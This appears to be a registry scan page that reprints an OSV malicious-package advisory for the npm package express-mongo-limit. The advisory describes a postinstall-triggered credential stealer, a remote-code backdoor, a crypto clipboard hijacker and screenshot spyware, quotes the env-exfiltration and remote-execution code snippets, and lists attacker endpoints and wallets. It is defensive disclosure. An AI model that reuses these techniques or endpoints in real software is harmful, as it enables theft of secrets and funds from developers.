registry  /  express-mongo-limit  /  1.0.0

express-mongo-limit@1.0.0

OSV Malicious Advisory

scanned 4h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-7012 confirms this npm version as malicious. The npm package `express-mongo-limit` masquerades as an Express/MongoDB payload sanitization middleware (likely typosquatting `express-mongo-sanitize`) but is a credential stealer, remote-code-execution backdoor, crypto clipboard hijacker, and screenshot spyware. It declares a `postinstall: node index.js` hook, so the payload executes automatically on install. The obfuscated `config/auth.js` (built with...

Advisory
MAL-2026-7012
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in express-mongo-limit (npm)
Details
The npm package `express-mongo-limit` masquerades as an Express/MongoDB payload sanitization middleware (likely typosquatting `express-mongo-sanitize`) but is a credential stealer, remote-code-execution backdoor, crypto clipboard hijacker, and screenshot spyware. It declares a `postinstall: node index.js` hook, so the payload executes automatically on install. The obfuscated `config/auth.js` (built with `javascript-obfuscator`) exfiltrates the victim's entire `process.env` via `axios.post(url, {...process.env}, { headers: { 'x-app-request': 'ip-check' } })` to an attacker-controlled endpoint, and `index.js` fetches arbitrary JavaScript from a C2 server and executes it with `new Function("require", response.data)(require)`, writing the payload to `apiKeyResponse.js` for persistence. Version 2.0.1 additionally ships `service.js`, a clipboard hijacker that monitors the clipboard and silently replaces detected Ethereum/BNB, Bitcoin, Solana, and Tron wallet addresses with the attacker's wallets, and `app.js`, which captures the desktop screen every 2 seconds and emails each screenshot to `daniattacker@gmail.com` via nodemailer/Gmail. It establishes persistence by globally installing `pm2`, `clipboardy`, and `screenshot-desktop` and registering `service.js` as a PM2 startup service. Version 1.0.0 is a benign "Hello World" decoy used to stage the package name. The package was published by npm user `jon_conway` (`daniattacker@gmail.com`). --- ## Source: amazon-inspector (8f17b459e01affe3f0cc1640da6fcc4e1db9cdf3b7379caa6e6865747ce71a60) The package advertises itself as an Express/Mongo payload sanitizer but its postinstall hook (`node index.js`) globally installs pm2, clipboardy, and screenshot-desktop, then runs `pm2 start service.js`, `pm2 save`, and `pm2 startup` to persist a background service across reboots on the installer's machine. The persisted service (`service.js`) polls the system clipboard once per second and, when it detects an ETH/BSC, BTC, Solana, or Tron address, replaces it with hardcoded attacker wallets (ETH 0x62Fc857DE5469fDd81F57F309c2fb000cad7bbbb, BTC bc1q8tzzpun6rd45s6fgar2up8nfelt4u2r2h999cc, SOL 6A7vQWJveJBWP78oktAjoZbMakrCAQyLphJ5Kswy5xA4, TRX TUqk5th1eXZWrt1arsqpxZ3frqaCxc9Lr4) to redirect cryptocurrency transfers. A sibling `app.js` runs an infinite 2-second loop that captures the desktop via screenshot-desktop and emails each screenshot via nodemailer through a Gmail account (daniattacker@gmail.com); the app password is a placeholder in this version but the harvesting and delivery framework is fully wired. `config/auth.js` also exports a `verify()` helper that POSTs the entire `process.env` to a base64-obfuscated Vercel endpoint (gamboracle.vercel.app/api; a second endpoint ipcheck-six.vercel.app/api is stored in `.env`), with an `atob`-based decoder used to hide the destinations. The package name and description mimic the widely-used `express-mongo-sanitize` while the README is an unrelated `hello-world-package` stub, indicating the metadata is a lure. Installation on a default `npm install` triggers persistent RCE, clipboard-based crypto theft, desktop screenshot exfiltration, and provides an env-var exfiltration primitive to attacker-controlled endpoints.
Decision reason
OpenSSF Malicious Packages via OSV confirms express-mongo-limit@1.0.0 as malicious (MAL-2026-7012): Malicious code in express-mongo-limit (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory